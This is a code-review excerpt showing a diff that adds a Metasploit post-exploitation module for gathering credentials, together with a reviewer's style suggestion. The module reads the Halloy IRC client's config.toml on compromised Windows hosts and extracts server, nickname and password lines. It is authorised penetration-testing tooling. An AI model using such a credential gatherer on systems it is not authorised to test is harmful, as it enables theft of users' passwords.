modules/post/windows/gather/credentials/halloy_irc.rb

```diff
@@ -0,0 +1,95 @@
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  # this associative array defines the artifacts known to PackRat
+  include Msf::Post::File
+  include Msf::Post::Windows::UserProfiles
+  include Msf::Post::Windows::Packrat
+  ARTIFACTS =
+    {
+      application: 'Halloy IRC',
+      app_category: 'IRC',
+      gatherable_artifacts: [
+        {
+          filetypes: 'logins',
+          path: 'AppData',
+          dir: 'halloy',
+          artifact_file_name: 'config.toml',
+          description: 'Saved Bookmarks',
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:server =.*)',
+                '(?i-mx:port =.*)',
+                '(?i-mx:nickname =.*)',
+                '(?i-mx:password =.*)'
+              ]
+            }
+          ]
+        }
+      ]
+    }.freeze
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Halloy IRC credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for credentials stored on Halloy IRC Client in a windows remote host.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Jacob Tierney',
+          'Kazuyoshi Maruta',
+          'Daniel Hallsworth',
+          'Barwar Salim M',
+          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
+        ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        # OptRegexp.new('REGEX', [false, 'Match a regular expression', '^secret']),
+        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
+        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
+        # enumerates the options based on the artifacts that are defined below
+        OptEnum.new('ARTIFACTS', [
+          false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map do |k|
+                                                          k[:filetypes]
+                                                        end.uniq.unshift('All')
+        ])
+      ]
+    )
```

Comment:
I think this is much easier to read, grabbed from one of your other PRs

```suggestion
        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
```